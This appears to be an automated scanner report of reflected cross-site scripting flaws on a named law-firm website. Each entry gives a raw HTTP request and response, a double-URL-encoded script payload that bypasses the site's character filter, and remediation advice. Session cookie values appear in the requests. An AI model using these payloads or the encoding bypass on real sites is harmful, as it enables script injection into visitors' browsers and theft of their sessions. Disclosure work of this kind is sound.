GET /js/ui.datepicker.js29ad5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee294e4483ea HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd was submitted in the REST URL parameter 1. This input was echoed as fe969"><script>alert(1)</script>c77ca9823dd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /jsfe969%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec77ca9823dd/ui.dialog.js HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:59 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de was submitted in the REST URL parameter 2. This input was echoed as 4ae75"><script>alert(1)</script>6ccc3364de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.dialog.js4ae75%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6ccc3364de HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed was submitted in the REST URL parameter 1. This input was echoed as 41fbd"><script>alert(1)</script>3ba108ca8ed in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js41fbd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3ba108ca8ed/ui.draggable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 was submitted in the REST URL parameter 2. This input was echoed as ee808"><script>alert(1)</script>982f7a16b81 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.draggable.jsee808%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e982f7a16b81 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e was submitted in the REST URL parameter 1. This input was echoed as 159bb"><script>alert(1)</script>ff8afb5f36e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js159bb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eff8afb5f36e/ui.resizable.js HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 was submitted in the REST URL parameter 2. This input was echoed as 6dd6d"><script>alert(1)</script>a322173fb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /js/ui.resizable.js6dd6d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea322173fb55 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f was submitted in the REST URL parameter 1. This input was echoed as 4823f"><script>alert(1)</script>74755294a4f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss4823f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e74755294a4f/awards/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe was submitted in the REST URL parameter 2. This input was echoed as 3ddba"><script>alert(1)</script>b482c6d5ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards3ddba%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb482c6d5ffe/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 was submitted in the REST URL parameter 3. This input was echoed as 4862c"><script>alert(1)</script>626bbbadd84 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/awards/rss.xml4862c%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e626bbbadd84 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56 was submitted in the REST URL parameter 1. This input was echoed as 96c9a"><script>alert(1)</script>b17c06f0b56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss96c9a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb17c06f0b56/events/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192 was submitted in the REST URL parameter 2. This input was echoed as 8d1d6"><script>alert(1)</script>3f934a0d192 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events8d1d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f934a0d192/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a was submitted in the REST URL parameter 3. This input was echoed as 5ac25"><script>alert(1)</script>a7c854d93a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/events/rss.xml5ac25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea7c854d93a HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:11:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c was submitted in the REST URL parameter 1. This input was echoed as cefc3"><script>alert(1)</script>b60ad84eb9c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rsscefc3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb60ad84eb9c/in_the_news/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4 was submitted in the REST URL parameter 2. This input was echoed as cc00e"><script>alert(1)</script>d760b3b5dd4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_newscc00e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed760b3b5dd4/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f was submitted in the REST URL parameter 3. This input was echoed as b6f54"><script>alert(1)</script>2151516518f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/in_the_news/rss.xmlb6f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2151516518f HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9 was submitted in the REST URL parameter 1. This input was echoed as 9abb7"><script>alert(1)</script>3d2f01cf3f9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss9abb7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d2f01cf3f9/news_releases/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5 was submitted in the REST URL parameter 2. This input was echoed as dc1d0"><script>alert(1)</script>98c2f7af3b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releasesdc1d0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e98c2f7af3b5/rss.xml HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 was submitted in the REST URL parameter 3. This input was echoed as ee81a"><script>alert(1)</script>d27cf73a803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /rss/news_releases/rss.xmlee81a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed27cf73a803 HTTP/1.1
Host: www.wileyrein.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=43582841; __utmz=83402768.1295449756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=18263656; __utma=83402768.904836967.1295449756.1295449756.1295449756.1; __utmc=83402768; __utmb=83402768.1.10.1295449756;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:10:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32ca8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e73f8dfaacf9 was submitted in the REST URL parameter 1. This input was echoed as 32ca8"><script>alert(1)</script>73f8dfaacf9 in the application's response.
